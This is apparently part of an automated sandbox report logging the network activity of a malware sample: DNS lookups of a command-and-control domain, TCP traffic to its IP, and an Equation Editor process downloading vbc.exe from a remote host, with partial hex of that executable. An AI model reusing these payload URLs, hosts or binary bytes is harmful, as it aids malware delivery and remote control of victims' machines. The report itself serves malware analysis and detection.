                                  Sep 14, 2021 21:49:58.038361073 CEST491835230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:58.039324999 CEST491835230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:58.208190918 CEST523049183194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:58.208528996 CEST491835230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:58.366199017 CEST523049183194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:58.366975069 CEST491835230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:58.566134930 CEST523049183194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:58.660212994 CEST523049183194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:58.661860943 CEST491835230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:58.819875956 CEST523049183194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:58.820832014 CEST491835230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:58.977459908 CEST523049183194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:58.977528095 CEST491835230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:59.135667086 CEST523049183194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:59.353149891 CEST491835230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:59.435239077 CEST523049183194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:59.435384035 CEST491835230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:50:03.196291924 CEST523049183194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:50:03.394027948 CEST491835230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:50:06.732708931 CEST523049183194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:50:06.982546091 CEST491835230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:50:08.197212934 CEST523049183194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:50:08.402617931 CEST491835230192.168.2.22194.5.98.103

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 14, 2021 21:48:20.608813047 CEST5216753192.168.2.228.8.8.8
                                  Sep 14, 2021 21:48:20.636506081 CEST53521678.8.8.8192.168.2.22
                                  Sep 14, 2021 21:48:21.665195942 CEST5059153192.168.2.228.8.8.8
                                  Sep 14, 2021 21:48:21.705760956 CEST53505918.8.8.8192.168.2.22
                                  Sep 14, 2021 21:48:21.720523119 CEST5780553192.168.2.228.8.8.8
                                  Sep 14, 2021 21:48:21.765866995 CEST53578058.8.8.8192.168.2.22
                                  Sep 14, 2021 21:48:33.416089058 CEST5903053192.168.2.228.8.8.8
                                  Sep 14, 2021 21:48:33.444324017 CEST53590308.8.8.8192.168.2.22
                                  Sep 14, 2021 21:48:34.379592896 CEST5918553192.168.2.228.8.8.8
                                  Sep 14, 2021 21:48:34.412233114 CEST53591858.8.8.8192.168.2.22
                                  Sep 14, 2021 21:48:34.430608988 CEST5561653192.168.2.228.8.8.8
                                  Sep 14, 2021 21:48:34.457621098 CEST53556168.8.8.8192.168.2.22
                                  Sep 14, 2021 21:48:39.741689920 CEST4997253192.168.2.228.8.8.8
                                  Sep 14, 2021 21:48:39.768774986 CEST53499728.8.8.8192.168.2.22
                                  Sep 14, 2021 21:48:40.797125101 CEST5177153192.168.2.228.8.8.8
                                  Sep 14, 2021 21:48:40.829777956 CEST53517718.8.8.8192.168.2.22
                                  Sep 14, 2021 21:48:40.843712091 CEST5986753192.168.2.228.8.8.8
                                  Sep 14, 2021 21:48:40.870394945 CEST53598678.8.8.8192.168.2.22
                                  Sep 14, 2021 21:48:50.036150932 CEST5031553192.168.2.228.8.8.8
                                  Sep 14, 2021 21:48:50.222748041 CEST53503158.8.8.8192.168.2.22
                                  Sep 14, 2021 21:48:50.223546982 CEST5031553192.168.2.228.8.8.8
                                  Sep 14, 2021 21:48:50.259785891 CEST53503158.8.8.8192.168.2.22
                                  Sep 14, 2021 21:48:56.361530066 CEST5007253192.168.2.228.8.8.8
                                  Sep 14, 2021 21:48:56.391520023 CEST53500728.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:02.469218969 CEST5430453192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:02.652172089 CEST53543048.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:02.653084040 CEST5430453192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:02.679889917 CEST53543048.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:08.668669939 CEST4989453192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:08.705600023 CEST53498948.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:08.706376076 CEST4989453192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:08.742361069 CEST53498948.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:14.847570896 CEST6464553192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:14.896507025 CEST53646458.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:20.945839882 CEST5374553192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:20.973970890 CEST53537458.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:26.961635113 CEST5435853192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:26.997615099 CEST53543588.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:26.998177052 CEST5435853192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:27.033485889 CEST53543588.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:33.864422083 CEST6501753192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:34.039748907 CEST53650178.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:34.040301085 CEST6501753192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:34.068306923 CEST53650178.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:39.906856060 CEST5834153192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:40.095714092 CEST53583418.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:40.097239017 CEST5834153192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:40.122410059 CEST53583418.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:40.123637915 CEST5834153192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:40.265785933 CEST53583418.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:40.266424894 CEST5834153192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:40.291413069 CEST53583418.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:45.901566982 CEST5638353192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:45.926116943 CEST53563838.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:52.162942886 CEST6217253192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:52.190934896 CEST53621728.8.8.8192.168.2.22
                                  Sep 14, 2021 21:49:57.855580091 CEST6085953192.168.2.228.8.8.8
                                  Sep 14, 2021 21:49:57.880382061 CEST53608598.8.8.8192.168.2.22

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  Sep 14, 2021 21:48:20.608813047 CEST192.168.2.228.8.8.80xe37eStandard query (0)www.google.comA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:48:33.416089058 CEST192.168.2.228.8.8.80x83bdStandard query (0)www.google.comA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:48:39.741689920 CEST192.168.2.228.8.8.80x67b4Standard query (0)www.google.comA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:48:50.036150932 CEST192.168.2.228.8.8.80x1101Standard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:48:50.223546982 CEST192.168.2.228.8.8.80x1101Standard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:48:56.361530066 CEST192.168.2.228.8.8.80x282Standard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:02.469218969 CEST192.168.2.228.8.8.80xebcbStandard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:02.653084040 CEST192.168.2.228.8.8.80xebcbStandard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:08.668669939 CEST192.168.2.228.8.8.80xcd8bStandard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:08.706376076 CEST192.168.2.228.8.8.80xcd8bStandard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:14.847570896 CEST192.168.2.228.8.8.80xed7fStandard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:20.945839882 CEST192.168.2.228.8.8.80x46f1Standard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:26.961635113 CEST192.168.2.228.8.8.80x62a2Standard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:26.998177052 CEST192.168.2.228.8.8.80x62a2Standard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:33.864422083 CEST192.168.2.228.8.8.80x2e0Standard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:34.040301085 CEST192.168.2.228.8.8.80x2e0Standard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:39.906856060 CEST192.168.2.228.8.8.80x52e0Standard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:40.097239017 CEST192.168.2.228.8.8.80x52e0Standard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:40.123637915 CEST192.168.2.228.8.8.80x52e0Standard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:40.266424894 CEST192.168.2.228.8.8.80x52e0Standard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:45.901566982 CEST192.168.2.228.8.8.80x2676Standard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:52.162942886 CEST192.168.2.228.8.8.80x8d92Standard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:57.855580091 CEST192.168.2.228.8.8.80xb1b9Standard query (0)e-businessloader.mywire.orgA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  Sep 14, 2021 21:48:20.636506081 CEST8.8.8.8192.168.2.220xe37eNo error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:48:33.444324017 CEST8.8.8.8192.168.2.220x83bdNo error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:48:39.768774986 CEST8.8.8.8192.168.2.220x67b4No error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:48:50.222748041 CEST8.8.8.8192.168.2.220x1101No error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:48:50.259785891 CEST8.8.8.8192.168.2.220x1101No error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:48:56.391520023 CEST8.8.8.8192.168.2.220x282No error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:02.652172089 CEST8.8.8.8192.168.2.220xebcbNo error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:02.679889917 CEST8.8.8.8192.168.2.220xebcbNo error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:08.705600023 CEST8.8.8.8192.168.2.220xcd8bNo error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:08.742361069 CEST8.8.8.8192.168.2.220xcd8bNo error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:14.896507025 CEST8.8.8.8192.168.2.220xed7fNo error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:20.973970890 CEST8.8.8.8192.168.2.220x46f1No error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:26.997615099 CEST8.8.8.8192.168.2.220x62a2No error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:27.033485889 CEST8.8.8.8192.168.2.220x62a2No error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:34.039748907 CEST8.8.8.8192.168.2.220x2e0No error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:34.068306923 CEST8.8.8.8192.168.2.220x2e0No error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:40.095714092 CEST8.8.8.8192.168.2.220x52e0No error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:40.122410059 CEST8.8.8.8192.168.2.220x52e0No error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:40.265785933 CEST8.8.8.8192.168.2.220x52e0No error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:40.291413069 CEST8.8.8.8192.168.2.220x52e0No error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:45.926116943 CEST8.8.8.8192.168.2.220x2676No error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:52.190934896 CEST8.8.8.8192.168.2.220x8d92No error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)
                                  Sep 14, 2021 21:49:57.880382061 CEST8.8.8.8192.168.2.220xb1b9No error (0)e-businessloader.mywire.org194.5.98.103A (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • www.google.com
                                  • 13.238.159.178

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.2249166172.217.168.36443C:\Users\Public\vbc.exe
                                  TimestampkBytes transferredDirectionData


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.2249168172.217.168.36443C:\Users\Public\vbc.exe
                                  TimestampkBytes transferredDirectionData


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  2192.168.2.2249170172.217.168.36443C:\Users\Public\vbc.exe
                                  TimestampkBytes transferredDirectionData


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  3192.168.2.224916513.238.159.17880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  TimestampkBytes transferredDirectionData
                                  Sep 14, 2021 21:48:12.847129107 CEST0OUTGET /truth/vbc.exe HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: 13.238.159.178
                                  Connection: Keep-Alive
                                  Sep 14, 2021 21:48:13.120636940 CEST1INHTTP/1.1 200 OK
                                  Date: Tue, 14 Sep 2021 19:48:11 GMT
                                  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9
                                  Last-Modified: Tue, 14 Sep 2021 18:45:13 GMT
                                  ETag: "a2e00-5cbf8fb685aa3"
                                  Accept-Ranges: bytes
                                  Content-Length: 667136
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: application/x-msdownload
                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 90 60 7f 18 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 24 0a 00 00 08 00 00 00 00 00 00 ce 43 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 43 0a 00 4b 00 00 00 00 60 0a 00 04 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 23 0a 00 00 20 00 00 00 24 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 04 04 00 00 00 60 0a 00 00 06 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0a 00 00 02 00 00 00 2c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 43 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 9c ec 08 00 e4 56 01 00 03 00 02 00 47 00 00 06 b8 79 01 00 e0 6b 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 20 9c 01 00 00 8d 01 00 00 01 25 d0 64 01 00 04 28 01 00 00 0a 80 65 01 00 04 20 94 00 00 00 8d 05 00 00 01 25 d0 66 01 00 04 28 01 00 00 0a 80 67 01 00 04 2a 1e 02 28 02 00 00 0a 2a 26 00 02 28 05 00 00 0a 00 2a ce 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 73 0a 00 00 0a 80 05 00 00 04 2a 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 0b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 0c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 0d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 0e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 0f 00 00 0a 0a 2b 00 06 2a 1b 30 05 00 ff 00 00 00 06 00 00 11 00 02 8c 06 00 00 1b 2c 0f 0f 00 fe 16 06 00 00 1b 6f 14 00 00 0a 2b 01 17 0b 07 39 d8 00 00 00 7e 06 00 00 04 14 fe 03 0c 08 2c 32 7e 06 00 00 04 d0 06 00 00 1b 28 15 00 00 0a 6f 16 00 00 0a 0d 09 2c 16 72 01 00 00 70 16 8d 16 00 00 01 28 17 00 00 0a 73 18 00 00 0a 7a 00 00 2b 0c 00 73 19 00 00 0a 80 06 00 00 04 00 7e 06 00 00 04 d0 06 00 00 1b 28 15 00 00 0a 14 6f 1a 00 00 0a 00 00 28 01 00 00 2b 0a de 74 75 12 00 00
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`$C @ `CK` H.text# $ `.rsrc`&@@.reloc,@BCHVGyk %d(e %f(g*(*&(*sssss*0~o+*0~o+*0~o+*0~o+*0~o+*0,o+9~,2~(o,rp(sz+s~(o(+tu
                                  Sep 14, 2021 21:48:13.122325897 CEST3INData Raw: 01 25 2d 04 26 16 2b 19 25 28 1c 00 00 0a 13 04 11 04 6f 1d 00 00 0a 14 fe 03 13 05 11 05 16 fe 03 fe 11 26 72 3b 00 00 70 17 8d 16 00 00 01 25 16 11 04 6f 1d 00 00 0a 6f 1e 00 00 0a a2 28 17 00 00 0a 13 06 11 06 11 04 6f 1d 00 00 0a 73 1f 00 00
                                  Data Ascii: %-&+%(o&r;p%oo(osz~(o +*1aZo!*&("*0(#($+*0(%+*0
                                  Sep 14, 2021 21:48:13.122363091 CEST4INData Raw: 0a 7e 29 00 00 0a 0a 2b 00 06 2a 00 00 13 30 02 00 3c 00 00 00 0d 00 00 11 00 7e 14 00 00 04 14 28 2b 00 00 0a 0b 07 2c 21 72 b9 00 00 70 d0 08 00 00 02 28 15 00 00 0a 6f 2c 00 00 0a 73 2d 00 00 0a 0c 08 80 14 00 00 04 00 00 7e 14 00 00 04 0a 2b
                                  Data Ascii: ~)+*0<~(+,!rp(o,s-~+*0~+*"*0&(2rp~o.(#t+*Vs7(/t*(0*0~+*0rpo1
                                  Sep 14, 2021 21:48:13.122459888 CEST5INData Raw: 72 d8 03 00 70 28 50 00 00 0a 26 2a 36 00 72 f0 03 00 70 28 50 00 00 0a 26 2a 00 1b 30 02 00 31 00 00 00 07 00 00 11 00 00 03 2c 0b 02 7b 20 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0d 02 7b 20 00 00 04 6f 51 00 00 0a 00 00 00 de 0a 00 02 03 28 52 00
                                  Data Ascii: rp(P&*6rp(P&*01,{ +,{ oQ(R*$%0sS} (sT{ sUo]{ sUo_sVoasWoksXomsWoosWou
                                  Sep 14, 2021 21:48:13.395565033 CEST7INData Raw: 88 00 00 06 20 d0 00 00 00 1f 16 73 67 00 00 0a 6f 6d 00 00 0a 00 02 6f 88 00 00 06 72 ca 05 00 70 6f 6e 00 00 0a 00 02 6f 70 00 00 06 6f 74 00 00 0a 1a 8d 49 00 00 01 25 16 02 6f 76 00 00 06 a2 25 17 02 6f 78 00 00 06 a2 25 18 02 6f 7a 00 00 06
                                  Data Ascii: sgomorponopotI%ov%ox%oz%ooroprpolopBsgomopr.ponovr@polov sgomovrxponoxrpolox sg
                                  Sep 14, 2021 21:48:13.395600080 CEST8INData Raw: 79 00 00 0a 00 02 6f 84 00 00 06 20 44 01 00 00 19 73 64 00 00 0a 6f 65 00 00 0a 00 02 6f 84 00 00 06 72 fc 0a 00 70 6f 66 00 00 0a 00 02 6f 84 00 00 06 1f 65 1f 3a 73 67 00 00 0a 6f 68 00 00 0a 00 02 6f 84 00 00 06 1f 6d 6f 69 00 00 0a 00 02 6f
                                  Data Ascii: yo Dsdoeorpofoe:sgohomoiorpojookor<p"@Asxoyo sdoeor,pofon:sgohonoiorpojook
                                  Sep 14, 2021 21:48:13.396718025 CEST10INData Raw: 00 00 06 72 3c 0a 00 70 22 00 00 c0 41 17 19 16 73 78 00 00 0a 6f 79 00 00 0a 00 02 6f a2 00 00 06 28 88 00 00 0a 6f 63 00 00 0a 00 02 6f a2 00 00 06 20 12 01 00 00 1f 44 73 64 00 00 0a 6f 65 00 00 0a 00 02 6f a2 00 00 06 72 3e 0c 00 70 6f 66 00
                                  Data Ascii: r<p"Asxoyo(oco Dsdoeor>pofo$%sgohoxoiorTpoEoozooorp"Asxoyo(ocoDsdoeorXpo
                                  Sep 14, 2021 21:48:13.396785975 CEST11INData Raw: 6f 95 00 00 0a 02 03 7d 2f 00 00 04 02 7b 2f 00 00 04 0b 07 2c 07 07 06 6f 96 00 00 0a 2a 26 02 7b 30 00 00 04 2b 00 2a 00 00 00 13 30 02 00 37 00 00 00 14 00 00 11 02 fe 06 54 00 00 06 73 38 00 00 0a 0a 02 7b 30 00 00 04 0b 07 2c 07 07 06 6f 95
                                  Data Ascii: o}/{/,o*&{0+*07Ts8{0,o}0{0,o*&{1+*07Hs8{1,o}1{1,o*&{2+*07Ms8{2,o
                                  Sep 14, 2021 21:48:13.396832943 CEST13INData Raw: 00 24 25 00 0a 00 00 00 00 13 30 08 00 7e 0d 00 00 00 00 00 00 00 02 73 53 00 00 0a 7d 45 00 00 04 02 73 5b 00 00 0a 6f ac 00 00 06 00 02 73 a2 00 00 0a 6f ae 00 00 06 00 02 73 5b 00 00 0a 6f b0 00 00 06 00 02 73 5b 00 00 0a 6f b2 00 00 06 00 02
                                  Data Ascii: $%0~sS}Es[osos[os[osososos[osososos[os[os[osVoso{Es\o
                                  Sep 14, 2021 21:48:13.396873951 CEST14INData Raw: 69 00 00 0a 00 02 6f c3 00 00 06 72 96 0d 00 70 6f 45 00 00 0a 00 02 6f c5 00 00 06 1f 48 1f 6e 73 64 00 00 0a 6f 65 00 00 0a 00 02 6f c5 00 00 06 72 a6 0d 00 70 6f 66 00 00 0a 00 02 6f c5 00 00 06 20 e1 00 00 00 1f 60 73 67 00 00 0a 6f 68 00 00
                                  Data Ascii: iorpoEoHnsdoeorpofo `sgohooiorpooI6sdoeorpoorpofo sgohooio(ooITsd
                                  Sep 14, 2021 21:48:13.396909952 CEST15INData Raw: 73 64 00 00 0a 6f 65 00 00 0a 00 02 6f d5 00 00 06 72 6a 0f 00 70 6f 66 00 00 0a 00 02 6f d5 00 00 06 20 e1 00 00 00 1f 60 73 67 00 00 0a 6f 68 00 00 0a 00 02 6f d5 00 00 06 1f 15 6f 69 00 00 0a 00 02 6f d5 00 00 06 72 c4 0d 00 70 6f ad 00 00 0a
                                  Data Ascii: sdoeorjpofo `sgohooiorpoooo sdoeorzpofo<sgohooiorpoEooo sdoeorpof


                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.2249166172.217.168.36443C:\Users\Public\vbc.exe
                                  TimestampkBytes transferredDirectionData
                                  2021-09-14 19:48:21 UTC0OUTGET / HTTP/1.1
                                  Host: www.google.com
                                  Connection: Keep-Alive
                                  2021-09-14 19:48:21 UTC0INHTTP/1.1 200 OK
                                  Date: Tue, 14 Sep 2021 19:48:21 GMT
                                  Expires: -1
                                  Cache-Control: private, max-age=0
                                  Content-Type: text/html; charset=ISO-8859-1
                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                  Server: gws
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  Set-Cookie: CONSENT=PENDING+542; expires=Fri, 01-Jan-2038 00:00:00 GMT; path=/; domain=.google.com; Secure
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                  Accept-Ranges: none
                                  Vary: Accept-Encoding
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  2021-09-14 19:48:21 UTC0INData Raw: 35 34 32 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65
                                  Data Ascii: 5424<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image
